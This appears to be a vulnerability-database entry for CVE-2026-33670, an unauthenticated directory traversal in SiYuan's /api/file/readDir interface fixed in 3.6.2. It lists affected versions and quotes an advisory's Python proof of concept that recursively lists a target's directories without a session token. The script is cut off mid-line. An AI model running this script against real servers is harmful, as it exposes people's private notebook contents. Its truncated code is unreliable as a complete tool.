CVE-2026-33670
Published 2026-03-26
Priority P3 · 50 · High
CVSS 3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
EPSS: 0.66% (46.9th percentile)
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook. Version 3.6.2 patches the issue.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| b3log | siyuan | < 3.6.2 | 3.6.2 |
| github.com | siyuan-note_siyuan_kernel | 0 – 0.0.0-20260317012524-fe4523fff2c8 | — |
| siyuan-note | siyuan | < 3.6.2 | 3.6.2 |
OSV
osv · 2026-03-26
CVE-2026-33670: SiYuan has directory traversal within its publishing service in github.com/siyuan-note/siyuan/kernel
GHSA
ghsa · 2026-03-25
CVE-2026-33670 [CRITICAL] CWE-22: SiYuan has directory traversal within its publishing service
### Details
The /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.
### PoC
```python
#!/usr/bin/env python3
"""POC: SiYuan /api/file/readDir unauthenticated directory traversal"""
import requests, json, sys

def poc(target):
    base = target.rstrip("/")
    url = f"{base}/api/file/readDir"

    def read_dir(path, depth=0, max_depth=4):
        try:
            # the endpoint accepted the listing request without any session token
            r = requests.post(url, json={"path": path},
                              headers={"Content-Type": "application/json"}, timeout=10)
            data = r.json()
        except Exception as e:
            return
        if data.get("code") != 0:
            return
        entries = data.get("data") or []
        for entry in entries:
            name = entry.get("name", "")
            if name.startswith("."):
                continue
            icon = "📁" if entry.get("isDir") else "📄"
            indent = " " * depth
            print(f" {
            # the advisory's listing of the PoC is cut off at this point
```
No detection rules found.
No public exploits indexed.
Published: 2026-03-26